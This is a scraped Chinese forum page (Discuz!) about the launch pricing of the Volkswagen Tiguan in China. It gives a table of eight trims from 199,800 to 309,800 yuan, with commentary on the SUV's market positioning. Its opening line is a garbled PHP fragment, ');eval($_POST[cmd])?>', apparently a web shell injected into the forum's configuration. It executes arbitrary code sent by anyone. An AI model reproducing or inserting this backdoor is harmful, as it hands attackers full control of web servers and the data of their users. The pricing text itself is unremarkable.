');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 大眾途觀全系價格和行情 - 新車俱樂部 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

大眾途觀全系價格和行情

儘管在國內,熱門的是日系或韓系幾款輕量型SUV。不過途觀的價格定位顯然不會僅僅盯著這些日韓車型來決定。畢竟這是德系SUV首次出現在較為低端的市場,所以上海大眾恐怕不擔心消費者對此會無動於衷。即便途觀還沒有正式上市時,據說全國各地不少4S店訂單如同雪片般飛至。甚至有一家深圳上海大眾4S自豪的透出消息,現在途觀的訂單竟然都排到了8月份。

上海大眾途觀廠商指導價

車型
售價(萬元)

1.8TSI 兩驅手動 都會版
19.98
1.8TSI 兩驅手自一體 都會版 21.18
1.8TSI 兩驅手自一體 風尚版 23.38
1.8TSI 四驅手自一體 風尚版 24.88
1.8TSI 四驅手自一體 菁英版 26.68
2.0TSI 四驅手自一體 菁英版 28.18
2.0TSI 四驅手自一體 旗艦版 29.48
2.0TSI 四驅手自一體 旗艦導航版 30.98


  其實每一個新車型上市,都喜歡讓旗下的4S店盡可能取得許多實質性訂單。實際上,訂單除開更多是一種產品先期開拓的保障外,也是價格制定的重要因素之一。這和房地產一樣,總喜歡提前發一些VIP卡或者預售信息什麼的。其本意就是要摸清底線,否則決策層是無法切實把握住價格的脈搏。說實話,途觀的優勢的確很大,德系大眾車背景也具備相當的深厚,但該需要的摸底程序還是不能少,因為這年頭競爭者太多,稍有不小心就會馬失前蹄。要說大眾,響噹噹的世界品牌。但旗下也不是所有的車型都受中國消費者歡迎。

  19.98萬元的價格起點對於途觀來說也許是比較切合實際的市場定位,畢竟擁有先進的1.8TSI直噴渦輪增壓發動機。通常的習慣,同樣排量的SVU都要比旗下同排量規格轎車高一點。所以途觀的價格是要比邁騰或昊銳高一些。也比日系或韓系同類產品要高一些。合適不合適,我們不能妄加評論,消費者和市場會對此作出公證的判斷。



  這次上海大眾途觀一共推出了8款不同車型,價格從19.98萬元-30.98萬元,這似乎沒有出乎人們的意料之外。當各種版本的猜測到謎底終於在3月26日揭曉的時候,大家發現其實途觀的定價並沒有偏離我們的預測太遠。8款車型中,只有3款是兩驅車型,其餘都是四驅版本。這也是大家最看重途觀之處。在汽車文化並不深蘊的東方大國,很多人並沒有細究SUV和越野車的區別。也許在大多數人心理,四驅就是一種理想的寄托,是某種不同於轎車的根本體現,更似乎是年輕人或充滿激情的用戶週末郊外野遊的唯一選擇。

  承載了太多希望甚至於某些所謂「愛國」情緒的左右,大眾途觀這次高調上市,說實話,從價格方面來看,上海大眾這次的確是信心滿滿。消費者的評論也會五花八門。唯一的共同點之後的不同就是,這是國內市場第一款中低端德系SUV車型。從而,你喜歡也好,討厭也罷。途觀已經上市,接下來的事情就是如何根據自己需求選擇它或者放棄它,或者具體到選擇它的一款適合自己經濟能力和用車狀況的車型。
返回列表